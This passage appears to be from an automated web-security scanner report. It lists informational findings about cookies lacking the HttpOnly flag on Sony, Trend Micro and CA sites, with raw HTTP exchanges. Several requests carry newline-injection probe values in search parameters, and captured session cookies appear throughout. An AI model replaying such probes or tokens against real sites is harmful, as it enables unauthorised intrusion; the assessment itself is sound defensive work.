__utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; 
s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE; JSESSIONID=0000hbdldlqruxn7wW5RLkXbe7x:14aelt2in; ABC123=7DYX+1Qz/QuAogZJJZljY957NC3b7BnKiPxMZiX67xjGNdnPFOQ8Ip6lm/ncya4bhXDpVhL6J7mBGds=; TS5bbf46=5285369a91c7b25e104e86b5dc8ca7e17a36af95430dd8404e666d6dd5df5daf8381a135

Response

HTTP/1.1 403 Forbidden
Content-Length: 356
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:58:53 GMT
Connection: close
Set-Cookie: TS5bbf46=da114474f5035b15c5e0e87e91973c20f38683c19e52537a4e666d6d; Path=/
X-N: S

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wcsstore/SonyStyleStorefrontAssetS
...[SNIP]...

7.9. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSS690CX.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSS690CX.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TS5bbf46 (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSS690CX.jpg HTTP/1.1
Host: store.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category
Cookie: foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; 
s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE; JSESSIONID=0000hbdldlqruxn7wW5RLkXbe7x:14aelt2in; ABC123=7DYX+1Qz/QuAogZJJZljY957NC3b7BnKiPxMZiX67xjGNdnPFOQ8Ip6lm/ncya4bhXDpVhL6J7mBGds=; TS5bbf46=5285369a91c7b25e104e86b5dc8ca7e17a36af95430dd8404e666d6dd5df5daf8381a135

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 22 Jan 2011 00:56:42 GMT
Accept-Ranges: bytes
Content-Length: 2538
Content-Type: image/jpeg
Date: Tue, 06 Sep 2011 18:58:53 GMT
Connection: close
Set-Cookie: TS5bbf46=2544eac492c2dc3895ccfa48e0767ad10bf63e8e5de0bbeb4e666d6d; Path=/
Cache-Control: private

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................1.K..
...[SNIP]...

7.10. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680CX.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680CX.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TS5bbf46 (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680CX.jpg HTTP/1.1
Host: store.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category
Cookie: foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; 
s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE; JSESSIONID=0000hbdldlqruxn7wW5RLkXbe7x:14aelt2in; ABC123=7DYX+1Qz/QuAogZJJZljY957NC3b7BnKiPxMZiX67xjGNdnPFOQ8Ip6lm/ncya4bhXDpVhL6J7mBGds=; TS5bbf46=5285369a91c7b25e104e86b5dc8ca7e17a36af95430dd8404e666d6dd5df5daf8381a135

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 22 Jan 2011 00:56:42 GMT
Accept-Ranges: bytes
Content-Length: 2226
Content-Type: image/jpeg
Date: Tue, 06 Sep 2011 18:58:53 GMT
Connection: close
Set-Cookie: TS5bbf46=1a65098a520cb6ff661ed74f78596f6045afc60247190eee4e666d6d; Path=/
Cache-Control: private

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................1.K..
...[SNIP]...

7.11. http://store.sony.com/webapp/wcs/stores/servlet/SYErrorRedirect

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SYErrorRedirect

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TS5bbf46 (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/SYErrorRedirect?URL=StoreCatalogDisplay&storeId=10151&langId=-1&catalogId=10551&eid=437018621 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16167
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.1.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10; mbox=session#1315352920400-736912#1315354842|PC#1315334914578-928682.19#1316562582|check#true#1315353042; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16167; ensUID=249118483jocCbfxsy2s; s_cc=true; s_visit=1; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Moved Temporarily
Location: http://store.sony.com:80/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621
Content-Length: 0
Content-Type: text/html
Content-Language: en-US
Date: Tue, 06 Sep 2011 18:49:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TS5bbf46=2877c4e6d661850e5150d0ea19ef0b38ff7b9fa6284bc12b4e666b3f; Path=/
Cache-Control: private


7.12. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SYSearchAjax

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/SYSearchAjax?keyword=xss&storeId=10151&langId=-1&catalogId=10551 HTTP/1.1
Host: store.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category
Cookie: CompareGrid=; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; 
s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
ntCoent-Length: 811
Content-Type: text/html
Content-Language: en-US
Content-Length: 811
Date: Tue, 06 Sep 2011 18:58:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TS5bbf46=2b9c93f9c1945f2c1cd8b18716b437e20bd7c268cce2babb4e666d6d; Path=/
Cache-Control: private


{"ResultSet": {
"suggestionList": [
{
"value": "XSS680CX",
"description": "Xpl%26%23333%3Bd%26trade%3B%20CX%20Series%20Speakers",
"img_url": "/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680C
...[SNIP]...

7.13. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=xss&x=0&y=0 HTTP/1.1
Host: store.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category
Cookie: CompareGrid=; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; 
s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
ntCoent-Length: 109762
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 109762
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:58:55 GMT
Connection: close
Set-Cookie: TS5bbf46=eff63d3571683f04c37995dc222b8da043cb60bb051a376c4e666d6e; Path=/
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type
...[SNIP]...

7.14. https://store.trendmicro.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js HTTP/1.1
Host: store.trendmicro.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://store.trendmicro.com/store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage
Cookie: __qca=P0-1207819931-1315351119372; bn_u=6923713920140458023; __utma=44797537.1048817980.1315351191.1315351191.1315351191.1; __utmz=44797537.1315351191.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; fsr.r={"d":90,"i":"1315351193052_377417","e":1315956018002}; __unam=e9c3bfd-132410b0872-607b674b-1; ORA_WX_SESSION=10.2.2.129:260-0#0; JSESSIONID=885803A57111A855BDA3F7D5608FCD0D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Thu, 02 Jun 2016 03:00:48 GMT
ETag: "80d-4891f577"
Content-Type: application/x-javascript
Last-Modified: Thu, 31 Jul 2008 17:25:11 GMT
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=7200+0;age=2440;ecid=105660496814,0)
Content-Length: 2061
Date: Thu, 02 Jun 2011 21:00:48 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app93
Accept-Ranges: bytes
Set-Cookie: BIGipServerp-drh-dc2pod9-pool1-active=1661075978.260.0000; path=/

var ptomodule={A:{},C:{},D:document,L:document.location,M:[],Q:{},T:new Date(),U:'',V:'2.7',Enabled:true,ST:"script",SA:
{"type":"text/javascript"},I:function(){var s=this.L.search;var c=this.D.cooki
...[SNIP]...

7.15. https://www.ca.com/siteminderagent/forms/login.fcc

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /siteminderagent/forms/login.fcc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /siteminderagent/forms/login.fcc HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141
Content-Length: 3488
Cache-Control: max-age=0
Origin: https://www.ca.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351598983:ss=1315351389192

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJODc0ODU5MzQ3D2QWAgIBEGRkFghmD2QWDgIJDxYEHgRocmVmBSJodHRwOi8vd3d3LmNhLmNvbS91cy9wcm9kdWN0cy5hc3B4Hglpbm5lcmh0bWwFCHByb2R1Y3RzZAIKDxYEHwAFLmh0dHA6Ly
